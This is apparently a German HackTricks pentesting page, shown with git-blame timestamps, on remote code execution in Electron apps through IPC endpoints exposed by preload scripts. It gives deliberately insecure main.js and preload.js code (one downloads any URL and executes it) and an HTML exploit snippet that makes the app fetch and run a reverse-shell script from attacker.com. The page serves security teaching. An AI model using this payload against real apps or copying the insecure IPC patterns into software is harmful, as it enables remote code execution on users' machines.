hacktricks/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md

113 lines
5.2 KiB
Markdown
Raw Normal View History

2022-04-28 16:01:33 +00:00
<details>
2024-02-10 15:36:32 +00:00
<summary><strong>Lernen Sie AWS-Hacking von Grund auf mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 15:36:32 +00:00
Andere Möglichkeiten, HackTricks zu unterstützen:
2022-04-28 16:01:33 +00:00
2024-02-10 15:36:32 +00:00
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
2022-04-28 16:01:33 +00:00
</details>
2024-02-10 15:36:32 +00:00
Wenn das Preload-Skript einen IPC-Endpunkt aus der main.js-Datei freigibt, kann der Renderer-Prozess darauf zugreifen und bei einer Schwachstelle möglicherweise eine RCE durchführen.
2022-04-28 13:04:05 +00:00
2024-02-10 15:36:32 +00:00
**Alle diese Beispiele wurden hier entnommen** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo). Weitere Informationen finden Sie im Video.
2022-04-28 13:04:05 +00:00
2024-02-10 15:36:32 +00:00
# Beispiel 1
2022-04-28 13:04:05 +00:00
2024-02-10 15:36:32 +00:00
Überprüfen Sie, wie `main.js` auf `getUpdate` hört und jede übergebene URL **herunterlädt und ausführt**.\
Überprüfen Sie auch, wie `preload.js` **jedes IPC-Ereignis** von der Hauptanwendung freigibt.
2022-04-28 13:04:05 +00:00
```javascript
// Part of code of main.js
ipcMain.on('getUpdate', (event, url) => {
2024-02-10 15:36:32 +00:00
console.log('getUpdate: ' + url)
mainWindow.webContents.downloadURL(url)
mainWindow.download_url = url
2022-04-28 13:04:05 +00:00
});
2024-02-10 15:36:32 +00:00
2022-04-28 13:04:05 +00:00
mainWindow.webContents.session.on('will-download', (event, item, webContents) => {
2024-02-10 15:36:32 +00:00
console.log('downloads path=' + app.getPath('downloads'))
console.log('mainWindow.download_url=' + mainWindow.download_url);
url_parts = mainWindow.download_url.split('/')
filename = url_parts[url_parts.length-1]
mainWindow.downloadPath = app.getPath('downloads') + '/' + filename
console.log('downloadPath=' + mainWindow.downloadPath)
// Set the save path, making Electron not to prompt a save dialog.
item.setSavePath(mainWindow.downloadPath)
item.on('updated', (event, state) => {
if (state === 'interrupted') {
console.log('Download is interrupted but can be resumed')
}
else if (state === 'progressing') {
if (item.isPaused()) console.log('Download is paused')
else console.log(`Received bytes: ${item.getReceivedBytes()}`)
}
})
item.once('done', (event, state) => {
if (state === 'completed') {
console.log('Download successful, running update')
fs.chmodSync(mainWindow.downloadPath, 0755);
var child = require('child_process').execFile;
child(mainWindow.downloadPath, function(err, data) {
if (err) { console.error(err); return; }
console.log(data.toString());
});
}
else console.log(`Download failed: ${state}`)
})
})
2022-04-28 13:04:05 +00:00
```
```javascript
// Part of code of preload.js
window.electronSend = (event, data) => {
2024-02-10 15:36:32 +00:00
ipcRenderer.send(event, data);
2022-04-28 13:04:05 +00:00
};
```
Exploit:
```html
<script>
electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");
</script>
```
2024-02-10 15:36:32 +00:00
# Beispiel 2
2022-04-28 13:04:05 +00:00
2024-02-10 15:36:32 +00:00
Wenn das Preload-Skript dem Renderer direkt eine Möglichkeit bietet, shell.openExternal aufzurufen, ist es möglich, RCE zu erlangen.
2022-04-28 13:04:05 +00:00
```javascript
// Part of preload.js code
window.electronOpenInBrowser = (url) => {
2024-02-10 15:36:32 +00:00
shell.openExternal(url);
2022-04-28 13:04:05 +00:00
};
```
2024-02-10 15:36:32 +00:00
# Beispiel 3
2022-04-28 13:04:05 +00:00
2024-02-10 15:36:32 +00:00
Wenn das Preload-Skript Möglichkeiten bietet, um vollständig mit dem Hauptprozess zu kommunizieren, kann ein XSS beliebige Ereignisse senden. Die Auswirkungen hängen davon ab, was der Hauptprozess in Bezug auf IPC freigibt.
2022-04-28 13:04:05 +00:00
```javascript
window.electronListen = (event, cb) => {
2024-02-10 15:36:32 +00:00
ipcRenderer.on(event, cb);
2022-04-28 13:04:05 +00:00
};
window.electronSend = (event, data) => {
2024-02-10 15:36:32 +00:00
ipcRenderer.send(event, data);
2022-04-28 13:04:05 +00:00
};
```
2022-04-28 16:01:33 +00:00
<details>
2024-02-10 15:36:32 +00:00
<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 15:36:32 +00:00
Andere Möglichkeiten, HackTricks zu unterstützen:
2022-04-28 16:01:33 +00:00
2024-02-10 15:36:32 +00:00
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
2022-04-28 16:01:33 +00:00
</details>